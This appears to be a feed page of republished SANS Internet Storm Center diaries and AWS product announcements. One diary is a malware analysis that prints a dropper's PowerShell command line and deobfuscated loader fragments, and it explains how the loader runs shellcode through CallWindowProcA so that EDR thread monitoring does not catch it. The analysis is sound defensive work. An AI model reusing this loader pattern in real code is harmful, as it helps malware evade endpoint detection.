All posts by David

pdf-parser: All Streams, (Sun, Aug 31st)

This post was originally published on this site

A user reported a bug in pdf-parser: when dumping all filtered streams, an error would occur:

The reason for the error, is that not all streams have filters applied to them, and thus dumping a filtered stream that has no filter caused a bug.

I have fixed this:

But I would like to point out that I think that a better way to look at the content of all the filtered streams, is to have pdf-parser produce JSON output and then display this with myjson-filter.py, like this:

Now you see the content of the streams, and to which object they belong. And if there are no filters, you also see this: 'No filters'.

Finally, the PDF comments that you saw in screenshot 2, are also gone: you only get streams.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

New general-purpose Amazon EC2 M8i and M8i Flex instances are now available

This post was originally published on this site

Today, we’re announcing the general availability of Amazon Elastic Compute Cloud (Amazon EC2) general-purpose M8i and M8i-Flex instances powered by custom Intel Xeon 6 processors available only on AWS with sustained all-core 3.9 GHz turbo frequency. These instances deliver the highest performance and fastest memory bandwidth among comparable Intel processors in the cloud. They also deliver up to 15 percent better price performance, up to 20 percent higher performance, and 2.5 times more memory bandwidth compared to previous generation M7i and M7i-Flex instances.

M8i and M8i-flex instances are ideal for running general purpose workloads such as general web application servers, virtual desktops, batch processing, microservices, databases, and enterprise applications. In terms of performance, these instances are specifically up to 60 percent faster for NGINX web applications, up to 30 percent faster for PostgreSQL database workloads, and up to 40 percent faster for AI deep learning recommendation models compared to M7i and M7i-Flex instances.

As like R8i and R8i-Flex instances, these instances use the new sixth generation AWS Nitro Cards, delivering up to two times more network and Amazon Elastic Block Storage (Amazon EBS) bandwidth compared to the previous generation instances. It greatly improves network throughput for workloads handling small packets such as web, application, and gaming servers. They also support bandwidth configuration with 25 percent allocation adjustments between network and Amazon EBS bandwidth, enabling better database performance, query processing, and logging speeds.

M8i instances
M8i instances provide up to 384 vCPUs and 1.5 TB memory including bare metal instances that provide dedicated access to the underlying physical hardware. These SAP-certified instances help you to run large application servers and databases, gaming servers, CPU-based inference, and video streaming that need the largest instance sizes or high CPU continuously.

Here are the specs for M8i instances:

Instance size vCPUs Memory (GiB) Network bandwidth (Gbps) EBS bandwidth (Gbps)
m8i.large 2 8 Up to 12.5 Up to 10
m8i.xlarge 4 16 Up to 12.5 Up to 10
m8i.2xlarge 8 32 Up to 15 Up to 10
m8i.4xlarge 16 64 Up to 15 Up to 10
m8i.8xlarge 32 128 15 10
m8i.12xlarge 48 192 22.5 15
m8i.16xlarge 64 256 30 20
m8i.24xlarge 96 384 40 30
m8i.32xlarge 128 512 50 40
m8i.48xlarge 192 768 75 60
m8i.96xlarge 384 1536 100 80
m8i.metal-48xl 192 768 75 60
m8i.metal-96xl 384 1536 100 80

M8i-Flex instances
M8i-Flex instances are a lower-cost variant of the M8i instances, with 5 percent better price performance at 5 percent lower prices. They’re designed for workloads that benefit from the latest generation performance but don’t fully utilize all compute resources. These instances can reach up to the full CPU performance 95 percent of the time.

Here are the specs for the M8i-Flex instances:

Instance size vCPUs Memory (GiB) Network bandwidth (Gbps) EBS bandwidth (Gbps)
m8i-flex.large 2 8 Up to 12.5 Up to 10
m8i-flex.xlarge 4 16 Up to 12.5 Up to 10
m8i-flex.2xlarge 8 32 Up to 15 Up to 10
m8i-flex.4xlarge 16 64 Up to 15 Up to 10
m8i-flex.8xlarge 32 128 Up to 15 Up to 10
m8i-flex.12xlarge 48 192 Up to 22.5 Up to 15
m8i-flex.16xlarge 64 256 Up to 30 Up to 20

If you’re currently using earlier generations of general-purpose instances, you can adopt M8i-Flex instances without having to make changes to your application or your workload.

Now available
Amazon EC2 M8i and M8i-Flex instances are available today in the US East (N. Virginia), US East (Ohio), US West (Oregon), and Europe (Spain) AWS Regions. M8i and M8i-Flex instances can be purchased as On-Demand, Savings Plan, and Spot instances. M8i instances are also available in Dedicated Instances and Dedicated Hosts. To learn more, visit the Amazon EC2 Pricing page.

Give M8i and M8i-Flex instances a try in the Amazon EC2 console. To learn more, visit the Amazon EC2 M8i instances page and send feedback to AWS re:Post for EC2 or through your usual AWS Support contacts.

Channy

Interesting Technique to Launch a Shellcode, (Wed, Aug 27th)

This post was originally published on this site

In most attack scenarios, attackers have to perform a crucial operation: to load a shellcode in memory and execute it. This is often performed in a three-step process:

  1. Some memory must be allocated and flagged as "executable" with VirtualAlloc() (and sometimes combined with VirtualProtect())
  2. The shellcode (often deobfuscated) is copied into this newly allocated memory region with a call to move() or alternatives
  3. The shellcode is launched using the creation of a new thread.

With this technique, the shellcode will be executed in the context of the current process, but alternative techniques might, of course, load and execute the shellcode in a remote process.

This technique is pretty well flagged by most EDRs.That's why Attackers are always looking for alternative ways to execute malicious code and defeat EDRs. I found a nice piece of PowerShell that implements such a technique! 

The PowerShell script is dropped by a Windows executable (SHA256:ec8ec8b3234ceeefbf74b2dc4914d5d6f7685655f6f33f2226e2a1d80e7ad488)[1]. It dumps many files, but two of them are interesting:

C:UsersREMAppDataRoamingCafeterias108butikscentersNonrepentancemenneskevrdige.Paa
C:UsersREMAppDataRoamingCafeterias108butikscentersSkydeprammenesBogskrivninger70.Mde

Then it launches the following command line:

"powershell.exe" -windowstyle minimized "$microcolorimetric=gc -Raw 'C:UsersREMAppDataRoamingCafeterias108butikscentersSkydeprammenesBogskrivninger70.Mde';$Hosiomartyr=$microcolorimetric.SubString(52695,3);

Let's check the substring extracted by PowerShell:

remnux@remnux:~/malwarezoo/20250825$ cut-bytes.py -d 52695:3l Bogskrivninger70.Mde 
Iex 

IEX (or "Invoke-Expression") is never good news in PowerShell scripts!

The file Bogskrivninger70.Mde is pretty well obfuscated:


The most interesting function is this one:


    
vrvlenes() will deobfuscate strings and, if the second parameter is set to a non-zero value, execute the deobfuscated string with IEX. I decoded all of them, and the following ones give a good understanding of the script.

First, we have calls to VirtualAlloc():

$global:integrity = $geparders.Invoke(0, 7119, $heterographical, $direktrstolene)
$global:autorisationens = $geparders.Invoke(0, 53846016, $heterographical, $krablende)

The second file (see above) is read:

$snatchy="$env:APPDATACafeterias108butikscentersNonrepentancemenneskevrdige.Paa"
$global:ventose = [System.IO.File]::ReadAllBytes($snatchy)

The shell code is extracted at offset 2048 (size 7119 bytes) and copied to the address returned by the first call to VirtualAlloc():

[System.Runtime.InteropServices.Marshal]::Copy($ventose, 2048,  $integrity, 7119)

A second payload is extracted and copied into the second memory region:

[System.Runtime.InteropServices.Marshal]::Copy($ventose, 7119+2048, $autorisationens, $revalideringscenteret36)

And now the magic will happen. The interesting variables are:

  • $gttes = "User32"
  • $thars = "CallWindowProcA":
$global:saarskorpers = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((endothorax $gttes $tahrs), (calumniators @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([IntPtr])))
$saarskorpers.Invoke($integrity,$autorisationens,$flagres,0,0)

I executed this script in the PowerShell ISE debugger to control it. Once the first memory allocation has been performed, let's attach a debugger to the PowerShell process:

$global:integrity = $geparders.Invoke(0, 7119, $heterographical, $direktrstolene)
[DBG]: PS C:UsersREM>> $integrity
2156785106944

That's where the new memory has been allocated (in hex 0x1F62A690000) and where the shellcode will be loaded. You can see that the memory has been zeroed (freshly allocated) and is ready to receive some data. Let's create a hardware breakpoint on this location:


    
In the deobfuscated strings, there is an interesting API call: CallWindowProc(). Let's create another breakpoint on it. Once reached, you can see the address of the shellcode passed as the first argument:


Let's allow PowerShell to invoke CallWindowProcA(), and we get the hardware breakpoint at the beginning of the shellcode:


Bad news, the shellcode crashed on my system…

Let's focus on the API call CallWindowProc()[2]. It is a Win32 GUI API that invokes a window procedure. You give it a function pointer; it calls that pointer with four arguments and returns the result. As usual, this API call is not malicious and can be very useful to developers to extend the capabilities of their GUI. For example, tools like screen readers, hotkey managers) can use this API call to monitor window messages.

Attackers can decide to use it because:

  • It executes code!
  • It accepts any function pointer and blindly executes it.
  • No new thread is needed! Many EDRs monitor CreateThread/NtCreateThreadEx. Here, execution happens on the existing GUI thread.
  • Looks “normal” for GUI apps. Calling window procedures and dispatching messages is standard GUI behavior, so this can blend in with benign activity.

 Conclusion: Attackers always find ways to operate below the radar with "exotic" API calls. CallWindowProc() is a new one to keep an eye on!

[1] https://www.virustotal.com/gui/file/ec8ec8b3234ceeefbf74b2dc4914d5d6f7685655f6f33f2226e2a1d80e7ad488/detection
[2] https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callwindowprocw

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Getting a Better Handle on International Domain Names and Punycode, (Tue, Aug 26th)

This post was originally published on this site

International domain names (IDN) continue to be an interesting topic. For the most part, they are probably less of an issue than some people make them out to be, given that popular browsers like Google Chrome are pretty selective in displaying them. But on the other hand, they are still used legitimately or not, and keeping a handle on them is interesting.

AWS services scale to new heights for Prime Day 2025: key metrics and milestones

This post was originally published on this site

Amazon Prime Day 2025 was the biggest Amazon Prime Day shopping event ever, setting records for both sales volume and total items sold during the 4-day event. Prime members saved billions while shopping Amazon’s millions of deals during the event.

This year marked a significant transformation in the Prime Day experience through advancements in the generative AI offerings from Amazon and AWS. Customers used Alexa+—the Amazon next-generation personal assistant now available in early access to millions of customers—along with the AI-powered shopping assistant, Rufus, and AI Shopping Guides. These features, built on more than 15 years of cloud innovation and machine learning expertise from AWS, combined with deep retail and consumer experience from Amazon, helped customers quickly discover deals and get product information, complementing the fast, free delivery that Prime members enjoy year-round.

As part of our annual tradition to tell you about how AWS powered Prime Day for record-breaking sales, I want to share the services and chart-topping metrics from AWS that made your amazing shopping experience possible.


Prime Day 2025 – all the numbers
During the weeks leading up to big shopping events like Prime Day, Amazon fulfillment centers and delivery stations work to get ready and ensure operations run efficiently and safely. For example, the Amazon automated storage and retrieval system (ASRS) operates a global fleet of industrial mobile robots that move goods around Amazon fulfillment centers.

AWS Outposts, a fully managed service that extends the AWS experience on-premises, powers software applications that manage the command-and-control of Amazon ASRS and supports same-day and next-day deliveries through low-latency processing of critical robotic commands.

During Prime Day 2025, AWS Outposts at one of the largest Amazon fulfillment centers sent more than 524 million commands to over 7,000 robots, reaching peak volumes of 8 million commands per hour—a 160 percent increase compared to Prime Day 2024.

Here are some more interesting, mind-blowing metrics:

  • Amazon Elastic Compute Cloud (Amazon EC2) – During Prime Day 2025, AWS Graviton, a family of processors designed to deliver the best price performance for cloud workloads running in Amazon EC2, powered more than 40 percent of the Amazon EC2 compute used by Amazon.com. Amazon also deployed over 87,000 AWS Inferentia and AWS Trainium chips – custom silicon chips for deep learning and generative AI training and inference – to power Amazon Rufus for Prime Day.
  • Amazon SageMaker AI — Amazon SageMaker AI, a fully managed service that brings together a broad set of tools to enable high-performance, low-cost machine learning (ML), processed more than 626 billion inference requests during Prime Day 2025.
  • Amazon Elastic Container Service (Amazon ECS) and AWS Fargate– Amazon Elastic Container Service (Amazon ECS) is a fully managed container orchestration service that works seamlessly with AWS Fargate, a serverless compute engine for containers. During Prime Day 2025, Amazon ECS launched an average of 18.4 million tasks per day on AWS Fargate, representing a 77 percent increase from the previous year’s Prime Day average.
  • AWS Fault Injection Service (AWS FIS) – We ran over 6,800 AWS FIS experiments—over eight times more than we conducted in 2024—to test resilience and ensure Amazon.com remains highly available on Prime Day. This significant increase was made possible by two improvements: new Amazon ECS support for network fault injection experiments on AWS Fargate, and the integration of FIS testing in continuous integration and continuous delivery (CI/CD) pipelines.
  • AWS Lambda – AWS Lambda, a serverless compute service that lets you run code without managing infrastructure, handled over 1.7 trillion invocations per day during Prime Day 2025.
  • Amazon API Gateway – During Prime Day 2025, Amazon API Gateway, a fully managed service that makes it easy to create, maintain, and secure APIs at any scale, processed over 1 trillion internal service requests—a 30 percent increase in requests on average per day compared to Prime Day 2024.
  • Amazon CloudFront – Amazon CloudFront, a content delivery network (CDN) service that securely delivers content with low latency and high transfer speeds, delivered over 3 trillion HTTP requests during the global week of Prime Day 2025, a 43 percent increase in requests compared to Prime Day 2024.
  • Amazon Elastic Block Store (Amazon EBS) – During Prime Day 2025, Amazon EBS, our high-performance block storage service, peaked at 20.3 trillion I/O operations, moving up to an exabyte of data daily.
  • Amazon Aurora – On Prime Day, Amazon Aurora, a relational database management system (RDBMS) built for high performance and availability at global scale for PostgreSQL, MySQL, and DSQL, processed 500 billion transactions, stored 4,071 terabytes of data, and transferred 999 terabytes of data.
  • Amazon DynamoDB – Amazon DynamoDB, a serverless, fully managed, distributed NoSQL database, powers multiple high-traffic Amazon properties and systems including Alexa, the Amazon.com sites, and all Amazon fulfillment centers. Over the course of Prime Day, these sources made tens of trillions of calls to the DynamoDB API. DynamoDB maintained high availability while delivering single-digit millisecond responses and peaking at 151 million requests per second.
  • Amazon ElastiCache – During Prime Day, Amazon ElastiCache, a fully managed caching service delivering microsecond latency, peaked at serving over 1.5 quadrillion daily requests and over 1.4 trillion requests in a minute.
  • Amazon Kinesis Data Streams – Amazon Kinesis Data Streams, a fully managed serverless data streaming service, processed a peak of 807 million records per second during Prime Day 2025.
  • Amazon Simple Queue Service (Amazon SQS) – During Prime Day 2025, Amazon SQS – a fully managed message queuing service for microservices, distributed systems, and serverless applications – set a new peak traffic record of 166 million messages per second.
  • Amazon GuardDuty – During Prime Day 2025, Amazon GuardDuty, an intelligent threat detection service, monitored an average of 8.9 trillion log events per hour, a 48.9 percent increase from last year’s Prime Day.
  • AWS CloudTrail – AWS CloudTrail, which tracks user activity and API usage on AWS, as well as in hybrid and multicloud environments, processed over 2.5 trillion events during Prime Day 2025, compared to 976 billion events in 2024.

Prepare to scale
If you’re preparing for similar business-critical events, product launches, and migrations, I recommend that you take advantage of our newly branded AWS Countdown (formerly known as AWS Infrastructure Event Management, or IEM). This comprehensive support program helps assess operational readiness, identify and mitigate risks, and plan capacity, using proven playbooks developed by AWS experts. We’ve expanded to include: generative AI implementation support to help you confidently launch and scale AI initiatives; migration and modernization support, including mainframe modernization; and infrastructure optimization for specialized sectors including election systems, retail operations, healthcare services, and sports and gaming events.

I look forward to seeing what other records will be broken next year!

Channy

AWS Weekly Roundup: Amazon Aurora 10th anniversary, Amazon EC2 R8 instances, Amazon Bedrock and more (August 25, 2025)

This post was originally published on this site

As I was preparing for this week’s roundup, I couldn’t help but reflect on how database technology has evolved over the past decade. It’s fascinating to see how architectural decisions made years ago continue to shape the way we build modern applications. This week brings a special milestone that perfectly captures this evolution in cloud database innovation as Amazon Aurora celebrated 10 years of database innovation.

Birthday cake with words Happy Birthday Amazon Aurora!

Amazon Web Services (AWS) Vice President Swami Sivasubramanian reflected on LinkedIn about his journey with Amazon Aurora, calling it “one of the most interesting products” he’s worked on. When Aurora launched in 2015, it shifted the database landscape by separating compute and storage. Now trusted by hundreds of thousands of customers across industries, Aurora has grown from a MySQL-compatible database to a comprehensive platform featuring innovations such as Aurora DSQL, serverless capabilities, I/O-Optimized pricing, zero-ETL integrations, and generative AI support. Last week’s celebration on August 21 highlighted this decade-long transformation that continues to simplify database scaling for customers.

Last week’s launches

In addition to the inspiring celebrations, here are some AWS launches that caught my attention:

  • AWS Billing and Cost Management introduces customizable Dashboards — This new feature consolidates cost data into visual dashboards with multiple widget types and visualization options, combining information from Cost Explorer, Savings Plans, and Reserved Instance reports to help organizations track spending patterns and share standardized cost reporting across accounts.
  • Amazon Bedrock simplifies access to OpenAI open weight models — AWS has streamlined access to OpenAI’s open weight models (gpt-oss-120b and gpt-oss-20b), making them automatically available to all users without manual activation while maintaining administrator control through IAM policies and service control policies.
  • Amazon Bedrock adds batch inference support for Claude Sonnet 4 and GPT-OSS models —This feature provides asynchronous processing of multiple inference requests with 50 percent lower pricing compared to on-demand inference, optimizing high-volume AI tasks such as document analysis, content generation, and data extraction with Amazon CloudWatch metrics for tracking batch workload progress
  • AWS launching Amazon EC2 R8i and R8i-flex memory-optimized instances — Powered by custom Intel Xeon 6 processors, these new instances deliver up to 20 percent better performance and 2.5 times higher memory throughput than R7i instances, making them ideal for memory-intensive workloads like databases and big data analytics, with R8i-flex offering additional cost savings for applications that don’t fully utilize compute resources.
  • Amazon S3 introduces batch data verification feature — A new capability in S3 Batch Operations that offers efficient verification of billions of objects using multiple checksum algorithms without downloading or restoring data, generating detailed integrity reports for compliance and audit purposes regardless of storage class or object size.

Other AWS news

Here are some additional projects and blog posts that you might find interesting:

  • Amazon introduces DeepFleet foundation models for multirobot coordination — Trained on millions of hours of data from Amazon fulfillment and sortation centers, these pioneering models predict future traffic patterns for robot fleets, representing the first foundation models specifically designed for coordinating multiple robots in complex environments.
  • Building Strands Agents with a few lines of code — A new blog demonstrates how to build multi-agent AI systems with a few lines of code, enabling specialized agents to collaborate seamlessly, handle complex workflows, and share information through standardized protocols for creating distributed AI systems beyond individual agent capabilities.
  • AWS Security Incident Response introduces ITSM integrations — New integrations with Jira and ServiceNow provide bidirectional synchronization of security incidents, comments, and attachments, streamlining response while maintaining existing processes, with open source code available on GitHub for customization and extension to additional IT service management (ITSM) platforms.
  • Finding root-causes using a network digital twin graph and agentic AI — A detailed blog post shows how AWS collaborated with NTT DOCOMO to build a network digital twin using graph databases and autonomous AI agents, helping telecom operators to move beyond correlation to identify true root causes of complex network issues, predict future problems, and improve overall service reliability.

Upcoming AWS events
Check your calendars and sign up for these upcoming AWS events:

  • AWS Summits — Join free online and in-person events that bring the cloud computing community together to connect, collaborate, and learn about AWS. Register in your nearest city: Toronto (September 4), Los Angeles (September 17), and Bogotá (October 9).
  • AWS re:Invent 2025 — This flagship annual conference is coming to Las Vegas from December 1–5. The event catalog is now available. Mark your calendars for this not to be missed gathering of the AWS community.
  • AWS Community Days — Join community-led conferences that feature technical discussions, workshops, and hands-on labs led by expert AWS users and industry leaders from around the world: Adria (September 5), Baltic (September 10), Aotearoa (September 18), South Africa (September 20), Bolivia (September 20), Portugal (September 27).

Join the AWS Builder Center to learn, build, and connect with builders in the AWS community. Browse here for upcoming in-person and virtual developer-focused events.

That’s all for this week. Check back next Monday for another Weekly Roundup!

Betty

The end of an era: Properly formated IP addresses in all of our data., (Sun, Aug 24th)

This post was originally published on this site

The Internet Storm Center and DShield websites are about 25 years old. Back in the day, I made some questionable decisions that I have never quite cleaned up later. One of these decisions was to use a "15 character 0-padded" format for IP addresses. This format padded each byte in the IP address with leading 0's, ensuring that they were all 15 characters long (including the '.'). 

Don't Forget The "-n" Command Line Switch, (Thu, Aug 21st)

This post was originally published on this site

A lot of people like the command line, the CLI, the shell (name it as you want) because it provides a lot of powerful tools to perform investigations. The best example is probably parsing logs! Even if we have SIEM to ingest and process them, many people still fall back to the good old suite of grep, cut, awk, sort, uniq, and many more.